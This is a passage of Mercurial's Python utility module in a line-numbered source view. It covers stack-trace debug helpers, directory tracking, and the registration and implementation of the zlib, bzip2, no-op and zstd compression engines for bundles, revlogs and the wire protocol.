|||
3499 | ''' |
|
|||
3500 | entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func)) |
|
|||
3501 | for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1] |
|
|||
3502 | ][-depth:] |
|
|||
3503 | if entries: |
|
|||
3504 | fnmax = max(len(entry[0]) for entry in entries) |
|
|||
3505 | for fnln, func in entries: |
|
|||
3506 | if line is None: |
|
|||
3507 | yield (fnmax, fnln, func) |
|
|||
3508 | else: |
|
|||
3509 | yield line % (fnmax, fnln, func) |
|
|||
3510 |
|
||||
3511 | def debugstacktrace(msg='stacktrace', skip=0, |
|
|||
3512 | f=stderr, otherf=stdout, depth=0): |
|
|||
3513 | '''Writes a message to f (stderr) with a nicely formatted stacktrace. |
|
|||
3514 | Skips the 'skip' entries closest to the call, then show 'depth' entries. |
|
|||
3515 | By default it will flush stdout first. |
|
|||
3516 | It can be used everywhere and intentionally does not require an ui object. |
|
|||
3517 | Not be used in production code but very convenient while developing. |
|
|||
3518 | ''' |
|
|||
3519 | if otherf: |
|
|||
3520 | otherf.flush() |
|
|||
3521 | f.write('%s at:\n' % msg.rstrip()) |
|
|||
3522 | for line in getstackframes(skip + 1, depth=depth): |
|
|||
3523 | f.write(line) |
|
|||
3524 | f.flush() |
|
|||
3525 |
|
||||
3526 | class dirs(object): |
|
|||
3527 | '''a multiset of directory names from a dirstate or manifest''' |
|
|||
3528 |
|
||||
3529 | def __init__(self, map, skip=None): |
|
|||
3530 | self._dirs = {} |
|
|||
3531 | addpath = self.addpath |
|
|||
3532 | if safehasattr(map, 'iteritems') and skip is not None: |
|
|||
3533 | for f, s in map.iteritems(): |
|
|||
3534 | if s[0] != skip: |
|
|||
3535 | addpath(f) |
|
|||
3536 | else: |
|
|||
3537 | for f in map: |
|
|||
3538 | addpath(f) |
|
|||
3539 |
|
||||
3540 | def addpath(self, path): |
|
|||
3541 | dirs = self._dirs |
|
|||
3542 | for base in finddirs(path): |
|
|||
3543 | if base in dirs: |
|
|||
3544 | dirs[base] += 1 |
|
|||
3545 | return |
|
|||
3546 | dirs[base] = 1 |
|
|||
3547 |
|
||||
3548 | def delpath(self, path): |
|
|||
3549 | dirs = self._dirs |
|
|||
3550 | for base in finddirs(path): |
|
|||
3551 | if dirs[base] > 1: |
|
|||
3552 | dirs[base] -= 1 |
|
|||
3553 | return |
|
|||
3554 | del dirs[base] |
|
|||
3555 |
|
||||
3556 | def __iter__(self): |
|
|||
3557 | return iter(self._dirs) |
|
|||
3558 |
|
||||
3559 | def __contains__(self, d): |
|
|||
3560 | return d in self._dirs |
|
|||
3561 |
|
||||
3562 | if safehasattr(parsers, 'dirs'): |
|
|||
3563 | dirs = parsers.dirs |
|
|||
3564 |
|
||||
3565 | def finddirs(path): |
|
|||
3566 | pos = path.rfind('/') |
|
|||
3567 | while pos != -1: |
|
|||
3568 | yield path[:pos] |
|
|||
3569 | pos = path.rfind('/', 0, pos) |
|
|||
3570 |
|
||||
3571 | # compression code |
|
|||
3572 |
|
||||
3573 | SERVERROLE = 'server' |
|
|||
3574 | CLIENTROLE = 'client' |
|
|||
3575 |
|
||||
3576 | compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport', |
|
|||
3577 | (u'name', u'serverpriority', |
|
|||
3578 | u'clientpriority')) |
|
|||
3579 |
|
||||
3580 | class compressormanager(object): |
|
|||
3581 | """Holds registrations of various compression engines. |
|
|||
3582 |
|
||||
3583 | This class essentially abstracts the differences between compression |
|
|||
3584 | engines to allow new compression formats to be added easily, possibly from |
|
|||
3585 | extensions. |
|
|||
3586 |
|
||||
3587 | Compressors are registered against the global instance by calling its |
|
|||
3588 | ``register()`` method. |
|
|||
3589 | """ |
|
|||
3590 | def __init__(self): |
|
|||
3591 | self._engines = {} |
|
|||
3592 | # Bundle spec human name to engine name. |
|
|||
3593 | self._bundlenames = {} |
|
|||
3594 | # Internal bundle identifier to engine name. |
|
|||
3595 | self._bundletypes = {} |
|
|||
3596 | # Revlog header to engine name. |
|
|||
3597 | self._revlogheaders = {} |
|
|||
3598 | # Wire proto identifier to engine name. |
|
|||
3599 | self._wiretypes = {} |
|
|||
3600 |
|
||||
3601 | def __getitem__(self, key): |
|
|||
3602 | return self._engines[key] |
|
|||
3603 |
|
||||
3604 | def __contains__(self, key): |
|
|||
3605 | return key in self._engines |
|
|||
3606 |
|
||||
3607 | def __iter__(self): |
|
|||
3608 | return iter(self._engines.keys()) |
|
|||
3609 |
|
||||
3610 | def register(self, engine): |
|
|||
3611 | """Register a compression engine with the manager. |
|
|||
3612 |
|
||||
3613 | The argument must be a ``compressionengine`` instance. |
|
|||
3614 | """ |
|
|||
3615 | if not isinstance(engine, compressionengine): |
|
|||
3616 | raise ValueError(_('argument must be a compressionengine')) |
|
|||
3617 |
|
||||
3618 | name = engine.name() |
|
|||
3619 |
|
||||
3620 | if name in self._engines: |
|
|||
3621 | raise error.Abort(_('compression engine %s already registered') % |
|
|||
3622 | name) |
|
|||
3623 |
|
||||
3624 | bundleinfo = engine.bundletype() |
|
|||
3625 | if bundleinfo: |
|
|||
3626 | bundlename, bundletype = bundleinfo |
|
|||
3627 |
|
||||
3628 | if bundlename in self._bundlenames: |
|
|||
3629 | raise error.Abort(_('bundle name %s already registered') % |
|
|||
3630 | bundlename) |
|
|||
3631 | if bundletype in self._bundletypes: |
|
|||
3632 | raise error.Abort(_('bundle type %s already registered by %s') % |
|
|||
3633 | (bundletype, self._bundletypes[bundletype])) |
|
|||
3634 |
|
||||
3635 | # No external facing name declared. |
|
|||
3636 | if bundlename: |
|
|||
3637 | self._bundlenames[bundlename] = name |
|
|||
3638 |
|
||||
3639 | self._bundletypes[bundletype] = name |
|
|||
3640 |
|
||||
3641 | wiresupport = engine.wireprotosupport() |
|
|||
3642 | if wiresupport: |
|
|||
3643 | wiretype = wiresupport.name |
|
|||
3644 | if wiretype in self._wiretypes: |
|
|||
3645 | raise error.Abort(_('wire protocol compression %s already ' |
|
|||
3646 | 'registered by %s') % |
|
|||
3647 | (wiretype, self._wiretypes[wiretype])) |
|
|||
3648 |
|
||||
3649 | self._wiretypes[wiretype] = name |
|
|||
3650 |
|
||||
3651 | revlogheader = engine.revlogheader() |
|
|||
3652 | if revlogheader and revlogheader in self._revlogheaders: |
|
|||
3653 | raise error.Abort(_('revlog header %s already registered by %s') % |
|
|||
3654 | (revlogheader, self._revlogheaders[revlogheader])) |
|
|||
3655 |
|
||||
3656 | if revlogheader: |
|
|||
3657 | self._revlogheaders[revlogheader] = name |
|
|||
3658 |
|
||||
3659 | self._engines[name] = engine |
|
|||
3660 |
|
||||
3661 | @property |
|
|||
3662 | def supportedbundlenames(self): |
|
|||
3663 | return set(self._bundlenames.keys()) |
|
|||
3664 |
|
||||
3665 | @property |
|
|||
3666 | def supportedbundletypes(self): |
|
|||
3667 | return set(self._bundletypes.keys()) |
|
|||
3668 |
|
||||
3669 | def forbundlename(self, bundlename): |
|
|||
3670 | """Obtain a compression engine registered to a bundle name. |
|
|||
3671 |
|
||||
3672 | Will raise KeyError if the bundle type isn't registered. |
|
|||
3673 |
|
||||
3674 | Will abort if the engine is known but not available. |
|
|||
3675 | """ |
|
|||
3676 | engine = self._engines[self._bundlenames[bundlename]] |
|
|||
3677 | if not engine.available(): |
|
|||
3678 | raise error.Abort(_('compression engine %s could not be loaded') % |
|
|||
3679 | engine.name()) |
|
|||
3680 | return engine |
|
|||
3681 |
|
||||
3682 | def forbundletype(self, bundletype): |
|
|||
3683 | """Obtain a compression engine registered to a bundle type. |
|
|||
3684 |
|
||||
3685 | Will raise KeyError if the bundle type isn't registered. |
|
|||
3686 |
|
||||
3687 | Will abort if the engine is known but not available. |
|
|||
3688 | """ |
|
|||
3689 | engine = self._engines[self._bundletypes[bundletype]] |
|
|||
3690 | if not engine.available(): |
|
|||
3691 | raise error.Abort(_('compression engine %s could not be loaded') % |
|
|||
3692 | engine.name()) |
|
|||
3693 | return engine |
|
|||
3694 |
|
||||
3695 | def supportedwireengines(self, role, onlyavailable=True): |
|
|||
3696 | """Obtain compression engines that support the wire protocol. |
|
|||
3697 |
|
||||
3698 | Returns a list of engines in prioritized order, most desired first. |
|
|||
3699 |
|
||||
3700 | If ``onlyavailable`` is set, filter out engines that can't be |
|
|||
3701 | loaded. |
|
|||
3702 | """ |
|
|||
3703 | assert role in (SERVERROLE, CLIENTROLE) |
|
|||
3704 |
|
||||
3705 | attr = 'serverpriority' if role == SERVERROLE else 'clientpriority' |
|
|||
3706 |
|
||||
3707 | engines = [self._engines[e] for e in self._wiretypes.values()] |
|
|||
3708 | if onlyavailable: |
|
|||
3709 | engines = [e for e in engines if e.available()] |
|
|||
3710 |
|
||||
3711 | def getkey(e): |
|
|||
3712 | # Sort first by priority, highest first. In case of tie, sort |
|
|||
3713 | # alphabetically. This is arbitrary, but ensures output is |
|
|||
3714 | # stable. |
|
|||
3715 | w = e.wireprotosupport() |
|
|||
3716 | return -1 * getattr(w, attr), w.name |
|
|||
3717 |
|
||||
3718 | return list(sorted(engines, key=getkey)) |
|
|||
3719 |
|
||||
3720 | def forwiretype(self, wiretype): |
|
|||
3721 | engine = self._engines[self._wiretypes[wiretype]] |
|
|||
3722 | if not engine.available(): |
|
|||
3723 | raise error.Abort(_('compression engine %s could not be loaded') % |
|
|||
3724 | engine.name()) |
|
|||
3725 | return engine |
|
|||
3726 |
|
||||
3727 | def forrevlogheader(self, header): |
|
|||
3728 | """Obtain a compression engine registered to a revlog header. |
|
|||
3729 |
|
||||
3730 | Will raise KeyError if the revlog header value isn't registered. |
|
|||
3731 | """ |
|
|||
3732 | return self._engines[self._revlogheaders[header]] |
|
|||
3733 |
|
||||
3734 | compengines = compressormanager() |
|
|||
3735 |
|
||||
3736 | class compressionengine(object): |
|
|||
3737 | """Base class for compression engines. |
|
|||
3738 |
|
||||
3739 | Compression engines must implement the interface defined by this class. |
|
|||
3740 | """ |
|
|||
3741 | def name(self): |
|
|||
3742 | """Returns the name of the compression engine. |
|
|||
3743 |
|
||||
3744 | This is the key the engine is registered under. |
|
|||
3745 |
|
||||
3746 | This method must be implemented. |
|
|||
3747 | """ |
|
|||
3748 | raise NotImplementedError() |
|
|||
3749 |
|
||||
3750 | def available(self): |
|
|||
3751 | """Whether the compression engine is available. |
|
|||
3752 |
|
||||
3753 | The intent of this method is to allow optional compression engines |
|
|||
3754 | that may not be available in all installations (such as engines relying |
|
|||
3755 | on C extensions that may not be present). |
|
|||
3756 | """ |
|
|||
3757 | return True |
|
|||
3758 |
|
||||
3759 | def bundletype(self): |
|
|||
3760 | """Describes bundle identifiers for this engine. |
|
|||
3761 |
|
||||
3762 | If this compression engine isn't supported for bundles, returns None. |
|
|||
3763 |
|
||||
3764 | If this engine can be used for bundles, returns a 2-tuple of strings of |
|
|||
3765 | the user-facing "bundle spec" compression name and an internal |
|
|||
3766 | identifier used to denote the compression format within bundles. To |
|
|||
3767 | exclude the name from external usage, set the first element to ``None``. |
|
|||
3768 |
|
||||
3769 | If bundle compression is supported, the class must also implement |
|
|||
3770 | ``compressstream`` and `decompressorreader``. |
|
|||
3771 |
|
||||
3772 | The docstring of this method is used in the help system to tell users |
|
|||
3773 | about this engine. |
|
|||
3774 | """ |
|
|||
3775 | return None |
|
|||
3776 |
|
||||
3777 | def wireprotosupport(self): |
|
|||
3778 | """Declare support for this compression format on the wire protocol. |
|
|||
3779 |
|
||||
3780 | If this compression engine isn't supported for compressing wire |
|
|||
3781 | protocol payloads, returns None. |
|
|||
3782 |
|
||||
3783 | Otherwise, returns ``compenginewireprotosupport`` with the following |
|
|||
3784 | fields: |
|
|||
3785 |
|
||||
3786 | * String format identifier |
|
|||
3787 | * Integer priority for the server |
|
|||
3788 | * Integer priority for the client |
|
|||
3789 |
|
||||
3790 | The integer priorities are used to order the advertisement of format |
|
|||
3791 | support by server and client. The highest integer is advertised |
|
|||
3792 | first. Integers with non-positive values aren't advertised. |
|
|||
3793 |
|
||||
3794 | The priority values are somewhat arbitrary and only used for default |
|
|||
3795 | ordering. The relative order can be changed via config options. |
|
|||
3796 |
|
||||
3797 | If wire protocol compression is supported, the class must also implement |
|
|||
3798 | ``compressstream`` and ``decompressorreader``. |
|
|||
3799 | """ |
|
|||
3800 | return None |
|
|||
3801 |
|
||||
3802 | def revlogheader(self): |
|
|||
3803 | """Header added to revlog chunks that identifies this engine. |
|
|||
3804 |
|
||||
3805 | If this engine can be used to compress revlogs, this method should |
|
|||
3806 | return the bytes used to identify chunks compressed with this engine. |
|
|||
3807 | Else, the method should return ``None`` to indicate it does not |
|
|||
3808 | participate in revlog compression. |
|
|||
3809 | """ |
|
|||
3810 | return None |
|
|||
3811 |
|
||||
3812 | def compressstream(self, it, opts=None): |
|
|||
3813 | """Compress an iterator of chunks. |
|
|||
3814 |
|
||||
3815 | The method receives an iterator (ideally a generator) of chunks of |
|
|||
3816 | bytes to be compressed. It returns an iterator (ideally a generator) |
|
|||
3817 | of bytes of chunks representing the compressed output. |
|
|||
3818 |
|
||||
3819 | Optionally accepts an argument defining how to perform compression. |
|
|||
3820 | Each engine treats this argument differently. |
|
|||
3821 | """ |
|
|||
3822 | raise NotImplementedError() |
|
|||
3823 |
|
||||
3824 | def decompressorreader(self, fh): |
|
|||
3825 | """Perform decompression on a file object. |
|
|||
3826 |
|
||||
3827 | Argument is an object with a ``read(size)`` method that returns |
|
|||
3828 | compressed data. Return value is an object with a ``read(size)`` that |
|
|||
3829 | returns uncompressed data. |
|
|||
3830 | """ |
|
|||
3831 | raise NotImplementedError() |
|
|||
3832 |
|
||||
3833 | def revlogcompressor(self, opts=None): |
|
|||
3834 | """Obtain an object that can be used to compress revlog entries. |
|
|||
3835 |
|
||||
3836 | The object has a ``compress(data)`` method that compresses binary |
|
|||
3837 | data. This method returns compressed binary data or ``None`` if |
|
|||
3838 | the data could not be compressed (too small, not compressible, etc). |
|
|||
3839 | The returned data should have a header uniquely identifying this |
|
|||
3840 | compression format so decompression can be routed to this engine. |
|
|||
3841 | This header should be identified by the ``revlogheader()`` return |
|
|||
3842 | value. |
|
|||
3843 |
|
||||
3844 | The object has a ``decompress(data)`` method that decompresses |
|
|||
3845 | data. The method will only be called if ``data`` begins with |
|
|||
3846 | ``revlogheader()``. The method should return the raw, uncompressed |
|
|||
3847 | data or raise a ``RevlogError``. |
|
|||
3848 |
|
||||
3849 | The object is reusable but is not thread safe. |
|
|||
3850 | """ |
|
|||
3851 | raise NotImplementedError() |
|
|||
3852 |
|
||||
3853 | class _zlibengine(compressionengine): |
|
|||
3854 | def name(self): |
|
|||
3855 | return 'zlib' |
|
|||
3856 |
|
||||
3857 | def bundletype(self): |
|
|||
3858 | """zlib compression using the DEFLATE algorithm. |
|
|||
3859 |
|
||||
3860 | All Mercurial clients should support this format. The compression |
|
|||
3861 | algorithm strikes a reasonable balance between compression ratio |
|
|||
3862 | and size. |
|
|||
3863 | """ |
|
|||
3864 | return 'gzip', 'GZ' |
|
|||
3865 |
|
||||
3866 | def wireprotosupport(self): |
|
|||
3867 | return compewireprotosupport('zlib', 20, 20) |
|
|||
3868 |
|
||||
3869 | def revlogheader(self): |
|
|||
3870 | return 'x' |
|
|||
3871 |
|
||||
3872 | def compressstream(self, it, opts=None): |
|
|||
3873 | opts = opts or {} |
|
|||
3874 |
|
||||
3875 | z = zlib.compressobj(opts.get('level', -1)) |
|
|||
3876 | for chunk in it: |
|
|||
3877 | data = z.compress(chunk) |
|
|||
3878 | # Not all calls to compress emit data. It is cheaper to inspect |
|
|||
3879 | # here than to feed empty chunks through generator. |
|
|||
3880 | if data: |
|
|||
3881 | yield data |
|
|||
3882 |
|
||||
3883 | yield z.flush() |
|
|||
3884 |
|
||||
3885 | def decompressorreader(self, fh): |
|
|||
3886 | def gen(): |
|
|||
3887 | d = zlib.decompressobj() |
|
|||
3888 | for chunk in filechunkiter(fh): |
|
|||
3889 | while chunk: |
|
|||
3890 | # Limit output size to limit memory. |
|
|||
3891 | yield d.decompress(chunk, 2 ** 18) |
|
|||
3892 | chunk = d.unconsumed_tail |
|
|||
3893 |
|
||||
3894 | return chunkbuffer(gen()) |
|
|||
3895 |
|
||||
3896 | class zlibrevlogcompressor(object): |
|
|||
3897 | def compress(self, data): |
|
|||
3898 | insize = len(data) |
|
|||
3899 | # Caller handles empty input case. |
|
|||
3900 | assert insize > 0 |
|
|||
3901 |
|
||||
3902 | if insize < 44: |
|
|||
3903 | return None |
|
|||
3904 |
|
||||
3905 | elif insize <= 1000000: |
|
|||
3906 | compressed = zlib.compress(data) |
|
|||
3907 | if len(compressed) < insize: |
|
|||
3908 | return compressed |
|
|||
3909 | return None |
|
|||
3910 |
|
||||
3911 | # zlib makes an internal copy of the input buffer, doubling |
|
|||
3912 | # memory usage for large inputs. So do streaming compression |
|
|||
3913 | # on large inputs. |
|
|||
3914 | else: |
|
|||
3915 | z = zlib.compressobj() |
|
|||
3916 | parts = [] |
|
|||
3917 | pos = 0 |
|
|||
3918 | while pos < insize: |
|
|||
3919 | pos2 = pos + 2**20 |
|
|||
3920 | parts.append(z.compress(data[pos:pos2])) |
|
|||
3921 | pos = pos2 |
|
|||
3922 | parts.append(z.flush()) |
|
|||
3923 |
|
||||
3924 | if sum(map(len, parts)) < insize: |
|
|||
3925 | return ''.join(parts) |
|
|||
3926 | return None |
|
|||
3927 |
|
||||
3928 | def decompress(self, data): |
|
|||
3929 | try: |
|
|||
3930 | return zlib.decompress(data) |
|
|||
3931 | except zlib.error as e: |
|
|||
3932 | raise error.RevlogError(_('revlog decompress error: %s') % |
|
|||
3933 | forcebytestr(e)) |
|
|||
3934 |
|
||||
3935 | def revlogcompressor(self, opts=None): |
|
|||
3936 | return self.zlibrevlogcompressor() |
|
|||
3937 |
|
||||
3938 | compengines.register(_zlibengine()) |
|
|||
3939 |
|
||||
3940 | class _bz2engine(compressionengine): |
|
|||
3941 | def name(self): |
|
|||
3942 | return 'bz2' |
|
|||
3943 |
|
||||
3944 | def bundletype(self): |
|
|||
3945 | """An algorithm that produces smaller bundles than ``gzip``. |
|
|||
3946 |
|
||||
3947 | All Mercurial clients should support this format. |
|
|||
3948 |
|
||||
3949 | This engine will likely produce smaller bundles than ``gzip`` but |
|
|||
3950 | will be significantly slower, both during compression and |
|
|||
3951 | decompression. |
|
|||
3952 |
|
||||
3953 | If available, the ``zstd`` engine can yield similar or better |
|
|||
3954 | compression at much higher speeds. |
|
|||
3955 | """ |
|
|||
3956 | return 'bzip2', 'BZ' |
|
|||
3957 |
|
||||
3958 | # We declare a protocol name but don't advertise by default because |
|
|||
3959 | # it is slow. |
|
|||
3960 | def wireprotosupport(self): |
|
|||
3961 | return compewireprotosupport('bzip2', 0, 0) |
|
|||
3962 |
|
||||
3963 | def compressstream(self, it, opts=None): |
|
|||
3964 | opts = opts or {} |
|
|||
3965 | z = bz2.BZ2Compressor(opts.get('level', 9)) |
|
|||
3966 | for chunk in it: |
|
|||
3967 | data = z.compress(chunk) |
|
|||
3968 | if data: |
|
|||
3969 | yield data |
|
|||
3970 |
|
||||
3971 | yield z.flush() |
|
|||
3972 |
|
||||
3973 | def decompressorreader(self, fh): |
|
|||
3974 | def gen(): |
|
|||
3975 | d = bz2.BZ2Decompressor() |
|
|||
3976 | for chunk in filechunkiter(fh): |
|
|||
3977 | yield d.decompress(chunk) |
|
|||
3978 |
|
||||
3979 | return chunkbuffer(gen()) |
|
|||
3980 |
|
||||
3981 | compengines.register(_bz2engine()) |
|
|||
3982 |
|
||||
3983 | class _truncatedbz2engine(compressionengine): |
|
|||
3984 | def name(self): |
|
|||
3985 | return 'bz2truncated' |
|
|||
3986 |
|
||||
3987 | def bundletype(self): |
|
|||
3988 | return None, '_truncatedBZ' |
|
|||
3989 |
|
||||
3990 | # We don't implement compressstream because it is hackily handled elsewhere. |
|
|||
3991 |
|
||||
3992 | def decompressorreader(self, fh): |
|
|||
3993 | def gen(): |
|
|||
3994 | # The input stream doesn't have the 'BZ' header. So add it back. |
|
|||
3995 | d = bz2.BZ2Decompressor() |
|
|||
3996 | d.decompress('BZ') |
|
|||
3997 | for chunk in filechunkiter(fh): |
|
|||
3998 | yield d.decompress(chunk) |
|
|||
3999 |
|
||||
4000 | return chunkbuffer(gen()) |
|
|||
4001 |
|
||||
4002 | compengines.register(_truncatedbz2engine()) |
|
|||
4003 |
|
||||
4004 | class _noopengine(compressionengine): |
|
|||
4005 | def name(self): |
|
|||
4006 | return 'none' |
|
|||
4007 |
|
||||
4008 | def bundletype(self): |
|
|||
4009 | """No compression is performed. |
|
|||
4010 |
|
||||
4011 | Use this compression engine to explicitly disable compression. |
|
|||
4012 | """ |
|
|||
4013 | return 'none', 'UN' |
|
|||
4014 |
|
||||
4015 | # Clients always support uncompressed payloads. Servers don't because |
|
|||
4016 | # unless you are on a fast network, uncompressed payloads can easily |
|
|||
4017 | # saturate your network pipe. |
|
|||
4018 | def wireprotosupport(self): |
|
|||
4019 | return compewireprotosupport('none', 0, 10) |
|
|||
4020 |
|
||||
4021 | # We don't implement revlogheader because it is handled specially |
|
|||
4022 | # in the revlog class. |
|
|||
4023 |
|
||||
4024 | def compressstream(self, it, opts=None): |
|
|||
4025 | return it |
|
|||
4026 |
|
||||
4027 | def decompressorreader(self, fh): |
|
|||
4028 | return fh |
|
|||
4029 |
|
||||
4030 | class nooprevlogcompressor(object): |
|
|||
4031 | def compress(self, data): |
|
|||
4032 | return None |
|
|||
4033 |
|
||||
4034 | def revlogcompressor(self, opts=None): |
|
|||
4035 | return self.nooprevlogcompressor() |
|
|||
4036 |
|
||||
4037 | compengines.register(_noopengine()) |
|
|||
4038 |
|
||||
4039 | class _zstdengine(compressionengine): |
|
|||
4040 | def name(self): |
|
|||
4041 | return 'zstd' |
|
|||
4042 |
|
||||
4043 | @propertycache |
|
|||
4044 | def _module(self): |
|
|||
4045 | # Not all installs have the zstd module available. So defer importing |
|
|||
4046 | # until first access. |
|
|||
4047 | try: |
|
|||
4048 | from . import zstd |
|
|||
4049 | # Force delayed import. |
|
|||
4050 | zstd.__version__ |
|
|||
4051 | return zstd |
|
|||
4052 | except ImportError: |
|
|||
4053 | return None |
|
|||
4054 |
|
||||
4055 | def available(self): |
|
|||
4056 | return bool(self._module) |
|
|||
4057 |
|
||||
4058 | def bundletype(self): |
|
|||
4059 | """A modern compression algorithm that is fast and highly flexible. |
|
|||
4060 |
|
||||
4061 | Only supported by Mercurial 4.1 and newer clients. |
|
|||
4062 |
|
||||
4063 | With the default settings, zstd compression is both faster and yields |
|
|||
4064 | better compression than ``gzip``. It also frequently yields better |
|
|||
4065 | compression than ``bzip2`` while operating at much higher speeds. |
|
|||
4066 |
|
||||
4067 | If this engine is available and backwards compatibility is not a |
|
|||
4068 | concern, it is likely the best available engine. |
|
|||
4069 | """ |
|
|||
4070 | return 'zstd', 'ZS' |
|
|||
4071 |
|
||||
4072 | def wireprotosupport(self): |
|
|||
4073 | return compewireprotosupport('zstd', 50, 50) |
|
|||
4074 |
|
||||
4075 | def revlogheader(self): |
|
|||
4076 | return '\x28' |
|
|||
4077 |
|
||||
4078 | def compressstream(self, it, opts=None): |
|
|||
4079 | opts = opts or {} |
|
|||
4080 | # zstd level 3 is almost always significantly faster than zlib |
|
|||
4081 | # while providing no worse compression. It strikes a good balance |
|
|||
4082 | # between speed and compression. |
|
|||
4083 | level = opts.get('level', 3) |
|
|||
4084 |
|
||||
4085 | zstd = self._module |
|
|||
4086 | z = zstd.ZstdCompressor(level=level).compressobj() |
|
|||
4087 | for chunk in it: |
|
|||
4088 | data = z.compress(chunk) |
|
|||
4089 | if data: |
|
|||
4090 | yield data |
|
|||
4091 |
|
||||
4092 | yield z.flush() |
|
|||
4093 |
|
||||
4094 | def decompressorreader(self, fh): |
|
|||
4095 | zstd = self._module |
|
|||
4096 | dctx = zstd.ZstdDecompressor() |
|
|||
4097 | return chunkbuffer(dctx.read_from(fh)) |
|
|||
4098 |
|
||||
4099 | class zstdrevlogcompressor(object): |
|
|||
4100 | def __init__(self, zstd, level=3): |
|
|||
4101 | # Writing the content size adds a few bytes to the output. However, |
|
|||
4102 | # it allows decompression to be more optimal since we can |
|
|||
4103 | # pre-allocate a buffer to hold the result. |
|
|||
4104 | self._cctx = zstd.ZstdCompressor(level=level, |
|
|||
4105 | write_content_size=True) |
|
|||
4106 | self._dctx = zstd.ZstdDecompressor() |
|
|||
4107 | self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE |
|
|||
4108 | self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE |
|
|||
4109 |
|
||||
4110 | def compress(self, data): |
|
|||
4111 | insize = len(data) |
|
|||
4112 | # Caller handles empty input case. |
|
|||
4113 | assert insize > 0 |
|
|||
4114 |
|
||||
4115 | if insize < 50: |
|
|||
4116 | return None |
|
|||
4117 |
|
||||
4118 | elif insize <= 1000000: |
|
|||
4119 | compressed = self._cctx.compress(data) |
|
|||
4120 | if len(compressed) < insize: |
|
|||
4121 | return compressed |
|
|||
4122 | return None |
|
|||
4123 | else: |
|
|||
4124 | z = self._cctx.compressobj() |
|
|||
4125 | chunks = [] |
|
|||
4126 | pos = 0 |
|
|||
4127 | while pos < insize: |
|
|||
4128 | pos2 = pos + self._compinsize |
|
|||
4129 | chunk = z.compress(data[pos:pos2]) |
|
|||
4130 | if chunk: |
|
|||
4131 | chunks.append(chunk) |
|
|||
4132 | pos = pos2 |
|
|||
4133 | chunks.append(z.flush()) |
|
|||
4134 |
|
||||
4135 | if sum(map(len, chunks)) < insize: |
|
|||
4136 | return ''.join(chunks) |
|
|||
4137 | return None |
|
|||
4138 |
|
||||
4139 | def decompress(self, data): |
|
|||
4140 | insize = len(data) |
|
|||
4141 |
|
||||
4142 | try: |
|
|||
4143 | # This was measured to be faster than other streaming |
|
|||
4144 | # decompressors. |
|
|||
4145 | dobj = self._dctx.decompressobj() |
|
|||
4146 | chunks = [] |
|
|||
4147 | pos = 0 |
|
|||
4148 | while pos < insize: |
|
|||
4149 | pos2 = pos + self._decompinsize |
|
|||
4150 | chunk = dobj.decompress(data[pos:pos2]) |
|
|||
4151 | if chunk: |
|
|||
4152 | chunks.append(chunk) |
|
|||
4153 | pos = pos2 |
|
|||
4154 | # Frame should be exhausted, so no finish() API. |
|
|||
4155 |
|
||||
4156 | return ''.join(chunks) |
|
|||
4157 | except Exception as e: |
|
|||
4158 | raise error.RevlogError(_('revlog decompress error: %s') % |
|
|||
4159 | forcebytestr(e)) |
|
|||
4160 |
|
||||
4161 | def revlogcompressor(self, opts=None): |
|
|||
4162 | opts = opts or {} |
|
|||
4163 | return self.zstdrevlogcompressor(self._module, |
|
|||
4164 | level=opts.get('level', 3)) |
|
|||
4165 |
|
||||
4166 | compengines.register(_zstdengine()) |
|
|||
4167 |
|
||||
4168 | def bundlecompressiontopics(): |
|
|||
4169 | """Obtains a list of available bundle compressions for use in help.""" |
|
|||
4170 | # help.makeitemsdocs() expects a dict of names to items with a .__doc__. |
|
|||
4171 | items = {} |
|
|||
4172 |
|
||||
4173 | # We need to format the docstring. So use a dummy object/type to hold it |
|
|||
4174 | # rather than mutating the original. |
|
|||
4175 | class docobject(object): |
|
|||
4176 | pass |
|
|||
4177 |
|
||||
4178 | for name in compengines: |
|
|||
4179 | engine = compengines[name] |
|
|||
4180 |
|
||||
4181 | if not engine.available(): |
|
|||
4182 | continue |
|
|||
4183 |
|
||||
4184 | bt = engine.bundletype() |
|
|||
4185 | if not bt or not bt[0]: |
|
|||
4186 | continue |
|
|||
4187 |
|
||||
4188 | doc = pycompat.sysstr('``%s``\n %s') % ( |
|
|||
4189 | bt[0], engine.bundletype.__doc__) |
|
|||
4190 |
|
||||
4191 | value = docobject() |
|
|||
4192 | value.__doc__ = doc |
|
|||
4193 | value._origdoc = engine.bundletype.__doc__ |
|
|||
4194 | value._origfunc = engine.bundletype |
|
|||
4195 |
|
||||
4196 | items[bt[0]] = value |
|
|||
4197 |
|
||||
4198 | return items |
|
|||
4199 |
|
||||
4200 | i18nfunctions = bundlecompressiontopics().values() |
|
|||
4201 |
|
||||
4202 | # convenient shortcut |
|
|||
4203 | dst = debugstacktrace |
|
|||
4204 |
|
||||
4205 | def safename(f, tag, ctx, others=None): |
|
|||
4206 | """ |
|
|||
4207 | Generate a name that it is safe to rename f to in the given context. |
|
|||
4208 |
|
||||
4209 | f: filename to rename |
|
|||
4210 | tag: a string tag that will be included in the new name |
|
|||
4211 | ctx: a context, in which the new name must not exist |
|
|||
4212 | others: a set of other filenames that the new name must not be in |
|
|||
4213 |
|
||||
4214 | Returns a file name of the form oldname~tag[~number] which does not exist |
|
|||
4215 | in the provided context and is not in the set of other names. |
|
|||
4216 | """ |
|
|||
4217 | if others is None: |
|
|||
4218 | others = set() |
|
|||
4219 |
|
||||
4220 | fn = '%s~%s' % (f, tag) |
|
|||
4221 | if fn not in ctx and fn not in others: |
|
|||
4222 | return fn |
|
|||
4223 | for n in itertools.count(1): |
|
|||
4224 | fn = '%s~%s~%s' % (f, tag, n) |
|
|||
4225 | if fn not in ctx and fn not in others: |
|
|||
4226 | return fn |
|
|||
4227 |
|
||||
4228 | def readexactly(stream, n): |
|
|||
4229 | '''read n bytes from stream.read and abort if less was available''' |
|
|||
4230 | s = stream.read(n) |
|
|||
4231 | if len(s) < n: |
|
|||
4232 | raise error.Abort(_("stream ended unexpectedly" |
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4233 | " (got %d bytes, expected %d)") |
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4234 | % (len(s), n)) |
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4235 | return s |
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4236 |
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4237 | def uvarintencode(value): |
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4238 | """Encode an unsigned integer value to a varint. |
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4239 |
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4240 | A varint is a variable length integer of 1 or more bytes. Each byte |
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4241 | except the last has the most significant bit set. The lower 7 bits of |
